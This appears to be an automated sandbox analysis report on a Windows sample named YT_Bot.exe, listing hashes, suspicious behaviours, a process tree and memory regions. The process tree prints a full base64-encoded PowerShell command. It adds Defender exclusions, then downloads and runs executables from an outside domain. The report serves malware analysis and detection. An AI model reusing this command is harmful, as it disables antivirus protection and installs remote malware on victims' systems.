Analysis
-
max time kernel
149s -
max time network
52s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
18-06-2024 14:39
Static task
static1
Behavioral task
behavioral1
Sample
YT Bot/Leaf.xNet.dll
Resource
win11-20240611-en
Behavioral task
behavioral2
Sample
YT Bot/YT_Bot.exe
Resource
win11-20240508-en
Behavioral task
behavioral3
Sample
YT Bot/Youtube-Viewers.exe.config
Resource
win11-20240611-en
Behavioral task
behavioral4
Sample
YT Bot/Youtube-Viewers.pdb
Resource
win11-20240508-en
General
-
Target
YT Bot/YT_Bot.exe
-
Size
2.4MB
-
MD5
240b2940002c38ebb3df80246920a729
-
SHA1
ecb8fcaf0babe0f000b5f7cceadfb9bc033d0467
-
SHA256
552a0e05f9fe148b38b8cd34f4dc699654feb0fb98584d5506001742a4d4bb0d
-
SHA512
d5448e5b3507ac5008ca405c90e7fec49f4594b919677cf4bbe9cd7faabda1ef02713b9a88bf69bc9f21bf986ba9411929e7f2f17cacc083e7af046f037297d1
-
SSDEEP
49152:KyAKtpUvBE36OzFna+zSZt0zXxxqY95TmPZjQ5897e9zVfzlD3VtOr8c5n:KyAK7UC6OpacKul8dQ5897mdlP25
Malware Config
Signatures
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
YT_Bot.exepid process 4584 YT_Bot.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2880 powershell.exe 2880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2880 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
YT_Bot.exepid process 4584 YT_Bot.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
YT_Bot.exedescription pid process target process PID 4584 wrote to memory of 2880 4584 YT_Bot.exe powershell.exe PID 4584 wrote to memory of 2880 4584 YT_Bot.exe powershell.exe PID 4584 wrote to memory of 2880 4584 YT_Bot.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\YT Bot\YT_Bot.exe"C:\Users\Admin\AppData\Local\Temp\YT Bot\YT_Bot.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAYQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQBqAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBzAHcAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAHAAZABiACcALAAgADwAIwB4AG4AaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAZgB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAdQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFkAbwB1AHQAdQBiAGUALQBWAGkAZQB3AGUAcgBzAC4AcABkAGIAJwApACkAPAAjAGYAdABsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAHgAbQBsACcALAAgADwAIwBhAGsAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAagBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAegBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AeABtAGwAJwApACkAPAAjAHEAYwByACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAGQAbABsACcALAAgADwAIwB2AHgAdgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZQBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAdQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AZABsAGwAJwApACkAPAAjAGEAaABiACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlAC4AYwBvAG4AZgBpAGcAJwAsACAAPAAjAGoAZgB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwBhAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBwAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAuAGMAbwBuAGYAaQBnACcAKQApADwAIwB0AHoAYwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwBsAC8AWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACwAIAA8ACMAZQBrAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHMAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AGgAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQApADwAIwBxAGYAaQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcALAAgADwAIwBmAHQAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHAAdgB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGQAYQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApACkAPAAjAHEAYgB4ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAC8AVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACwAIAA8ACMAcQB0AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAGUAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAG4AcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQApADwAIwBjAHQAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB5AGIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgB4AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACkAPAAjAHoAegBjACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAdAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAHYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZwBjAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegB5AHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAeAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwApADwAIwBnAHUAZwAjAD4A"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ueqk13ad.rww.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/2880-33-0x0000000006990000-0x00000000069AE000-memory.dmpFilesize
120KB
-
memory/2880-52-0x0000000074B70000-0x0000000075321000-memory.dmpFilesize
7.7MB
-
memory/2880-55-0x0000000074B70000-0x0000000075321000-memory.dmpFilesize
7.7MB
-
memory/2880-34-0x00000000075F0000-0x0000000007694000-memory.dmpFilesize
656KB
-
memory/2880-5-0x0000000004F10000-0x0000000004F46000-memory.dmpFilesize
216KB
-
memory/2880-6-0x0000000074B70000-0x0000000075321000-memory.dmpFilesize
7.7MB
-
memory/2880-7-0x00000000056F0000-0x0000000005D1A000-memory.dmpFilesize
6.2MB
-
memory/2880-8-0x0000000074B70000-0x0000000075321000-memory.dmpFilesize
7.7MB
-
memory/2880-9-0x0000000005620000-0x0000000005642000-memory.dmpFilesize
136KB
-
memory/2880-11-0x0000000005EF0000-0x0000000005F56000-memory.dmpFilesize
408KB
-
memory/2880-10-0x0000000005E10000-0x0000000005E76000-memory.dmpFilesize
408KB
-
memory/2880-35-0x0000000074B70000-0x0000000075321000-memory.dmpFilesize
7.7MB
-
memory/2880-14-0x0000000005F60000-0x00000000062B7000-memory.dmpFilesize
3.3MB
-
memory/2880-21-0x00000000063D0000-0x00000000063EE000-memory.dmpFilesize
120KB
-
memory/2880-22-0x0000000006460000-0x00000000064AC000-memory.dmpFilesize
304KB
-
memory/2880-24-0x0000000070D60000-0x0000000070DAC000-memory.dmpFilesize
304KB
-
memory/2880-23-0x00000000075B0000-0x00000000075E4000-memory.dmpFilesize
208KB
-
memory/2880-51-0x0000000074B70000-0x0000000075321000-memory.dmpFilesize
7.7MB
-
memory/2880-4-0x0000000074B7E000-0x0000000074B7F000-memory.dmpFilesize
4KB
-
memory/2880-50-0x0000000074B70000-0x0000000075321000-memory.dmpFilesize
7.7MB
-
memory/2880-37-0x0000000007D70000-0x00000000083EA000-memory.dmpFilesize
6.5MB
-
memory/2880-36-0x0000000074B70000-0x0000000075321000-memory.dmpFilesize
7.7MB
-
memory/2880-38-0x0000000007730000-0x000000000774A000-memory.dmpFilesize
104KB
-
memory/2880-39-0x00000000077B0000-0x00000000077BA000-memory.dmpFilesize
40KB
-
memory/2880-40-0x00000000079D0000-0x0000000007A66000-memory.dmpFilesize
600KB
-
memory/2880-41-0x0000000007940000-0x0000000007951000-memory.dmpFilesize
68KB
-
memory/2880-42-0x0000000007970000-0x000000000797E000-memory.dmpFilesize
56KB
-
memory/2880-43-0x0000000007980000-0x0000000007995000-memory.dmpFilesize
84KB
-
memory/2880-44-0x0000000007A70000-0x0000000007A8A000-memory.dmpFilesize
104KB
-
memory/2880-45-0x00000000079C0000-0x00000000079C8000-memory.dmpFilesize
32KB
-
memory/2880-46-0x0000000007AC0000-0x0000000007AE2000-memory.dmpFilesize
136KB
-
memory/2880-47-0x00000000089A0000-0x0000000008F46000-memory.dmpFilesize
5.6MB
-
memory/2880-49-0x0000000074B7E000-0x0000000074B7F000-memory.dmpFilesize
4KB
-
memory/4584-2-0x0000000000400000-0x0000000000DDE000-memory.dmpFilesize
9.9MB
-
memory/4584-0-0x0000000000400000-0x0000000000DDE000-memory.dmpFilesize
9.9MB
-
memory/4584-1-0x000000007FAA0000-0x000000007FE71000-memory.dmpFilesize
3.8MB
-
memory/4584-3-0x000000007FAA0000-0x000000007FE71000-memory.dmpFilesize
3.8MB